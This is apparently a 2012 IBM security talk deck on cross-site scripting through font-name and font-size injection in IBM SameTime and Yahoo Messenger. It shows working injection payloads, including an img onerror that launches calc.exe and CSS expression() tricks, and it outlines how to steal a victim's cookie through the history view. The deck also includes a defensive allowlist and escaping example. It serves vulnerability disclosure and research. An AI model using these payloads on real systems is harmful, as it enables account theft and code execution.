© 2012 IBM Corporation
IBM Security Systems
Stylish XSS via Font Name Injection
Background - Instant Messengers
Background - Instant Messengers
<Text Style="font-family:Segoe UI;font-weight:bold; font-style:italic; color:#008000; ">Hi!</Text>
Background - Instant Messengers
Every time I’ve seen this screen, I wondered “What if I could use some HTML here…”
Background - Windows Fonts
Windows accepts basically any character as part of the font name
Font name length limited to ~30 chars
IBM Lotus SameTime Messenger
<span style="font-size:14pt;font-family:Segoe UI;font-weight:normal;font-style:normal;">You Do!</span>
SameTime - Exploit - CSS
Font Name: expression(alert(1));
SameTime - Exploit - CSS
Font Name: expression(alert(1));
Desired output: <span style=";font-family:expression(alert(1));…">
Actual output: <span style="">
SameTime - Exploit - New Attribute
Font Name: "onclick="alert(1)"
Desired output: <span style="font-size:9pt;font-family:"onclick="alert(1)" ...">
Actual output: <span style="font-size:9pt;font-family:" onclick="">
SameTime - Exploit
~50 Fonts Later
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:
Message Received:
<span style=“…font-family:
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”<<style<style</style>img x='>
Message Received:
<span style=“…font-family:
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”<<style<style</style>img x='>
Message Received:
<span style=“…font-family:e0”><img x='>
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”<<style<style</style>img x='>Rest of Orig CSS">
Message Received:
<span style=“…font-family:e0”><img x='>Rest of Orig CSS">
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”<<style<style</style>img x='>Rest of Orig CSS">'src='x' onerror='location="c:\\windows\\system32\\calc.exe" '
Message Received:
<span style=“…font-family:e0”><img x='>Rest of Orig CSS">
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:\\windows\\system32\\calc.exe" '</span>
Message Received:
<span style=“…font-family:e0”><img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:\\windows\\system32\\calc.exe" '
</span>
SameTime – Remote Code Execution
<span style="font-size:14pt;font-family:e0"><img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:\\windows\\system32\\calc.exe"'</span>
Yahoo Messenger
Yahoo Messenger – Message View
Lots of Colors, but that’s about it…
Yahoo Messenger - History View
Finally, Yahoo's purple alert!
Yahoo Messenger - The Payload
<img src="x"onmouseover="alert(1)">
Yahoo Messenger - Digging Deeper
Wait, what?
It's not local?!
Yahoo Messenger - Digging Deeper
Accessing this URL in Chrome yields the same result.
Yahoo Messenger - Digging Deeper
That means I can read the cookie!
And steal your account!
Yahoo Messenger - Recap
1. Send the victim a message that contains a malicious HTML snippet
2. Wait 3-4 hours for it to show up in the history
3. Convince the user to access his history, or send him a direct link to it (after all, it's not local)
4. Have the victim click the Instant Message from the drop-down box
Yahoo Messenger - Introducing: Web Messenger!
Finally I can see the results of my attacks in real time!
Yahoo Messenger - Web Messenger
During the tests, I noticed that a <Font> tag sent as part of the message text is being rendered differently in the Web Messenger.
• The message: <font face="xxx" size="20">33333</font>
• Was rendered as: <font style="font-size:20pt" face="xxx" id="yui_3_2_0_20_1330267588862427">33333</font>
Yahoo Messenger - Exploiting CSS
Add a new rule with an expression() call.
Yahoo Messenger - Exploiting CSS
Started With:
<font face=ssss size="1&color:red">xxxx</font>
To my surprise, the response came back as I hoped:
<font style="font-size:1&color:red" >xxxx</font>
Yahoo Messenger - Exploiting CSS
Next was the expression:
<font face=sssss size="1&color:expression(alert(1))" >xxxx</font>
And again, it seems like nothing is filtering this...
<font style="font-size:1&color:expression(alert(1))">xxxx</font>
Yahoo Messenger - Exploiting CSS
Time to open Internet Explorer!
Yahoo Web Messenger - IE Version
The Rules (for IE):
1. The Size attribute must be surrounded by double-quotes (" ")
2. The size value must be followed by the "pt;" suffix
<font size="15pt;"> is rendered as <font style="font-size=15pt;">
Yahoo Web Messenger - IE Version
By tweaking the size value, a new Font-Family CSS rule could be injected.
<font size="15pt;font-family:aaaa;">
<font style="font-size=15pt;font-family: aaaa;">
Yahoo Web Messenger - IE Version
With all that in mind, and ~30 <Font> tags later, came the following payload that bypasses the CSS filtering:
<font size="15pt;font-family:expression\(alert\(1\)\);">
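The root cause on both the SameTime slides (font name concatenated into a style attribute) and the Yahoo slides (size value concatenated into font-size) is the same: a user-controlled value is pasted into markup as if it were trusted. The following is an added example, not code from the slides or from either product, contrasting that naive construction with a version that validates the font name and size against an allowlist and escapes the result (helper names are assumed):

```javascript
// Added example (not from the slides): naive attribute construction beside a
// hardened version that treats the font name and size as untrusted data.

// Naive rendering: the font name goes straight into the style attribute, so a
// name containing '"' or '>' closes the attribute and the tag, as the
// e0"><img x='... font name on the SameTime slides does.
function renderNaive(fontName, sizePt, text) {
  return `<span style="font-size:${sizePt}pt;font-family:${fontName};">${text}</span>`;
}

// Allowlist for a plausible font-family name: letters, digits, space, hyphen,
// underscore, at most 30 characters (the deck notes Windows caps font names at
// ~30 chars). '(' , '"', '&' and ';' are not in the alphabet, so neither
// expression(...) nor an extra CSS rule can get through. Sizes are digits only.
const FONT_NAME_RE = /^[A-Za-z0-9 _-]{1,30}$/;
const SIZE_RE = /^\d{1,3}$/;

function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// Hardened rendering: reject (do not "clean") values that fail their grammar,
// fall back to a safe default, and HTML-escape everything that lands in markup.
function renderSafe(fontName, sizePt, text) {
  const family = FONT_NAME_RE.test(fontName) ? fontName : "Segoe UI";
  const size = SIZE_RE.test(String(sizePt)) ? String(sizePt) : "9";
  return `<span style="font-size:${size}pt;font-family:${escapeHtml(family)};">${escapeHtml(text)}</span>`;
}

// Counts opening tags in the produced markup; a single span should yield 1.
function tagCount(html) {
  return (html.match(/<[A-Za-z]/g) || []).length;
}
```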
Yahoo Web Messenger - IE Version
It should work correctly according to the rendered source in IE Developer Tools
Yahoo Web Messenger - IE Version
Yet somehow, no alert
Yahoo Web Messenger - Uber Meta!
After ~5 hours of more fiddling and long lonely IM chats with myself, I finally found out what I was afraid of.
Or in other words, the "No Expression For You" Meta Tag:
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
Yahoo Web Messenger - Going Old School
Fired up my Windows XP VM and kicked out IE8
Yahoo Web Messenger - Finally
Yahoo Messenger - History Window
Questions?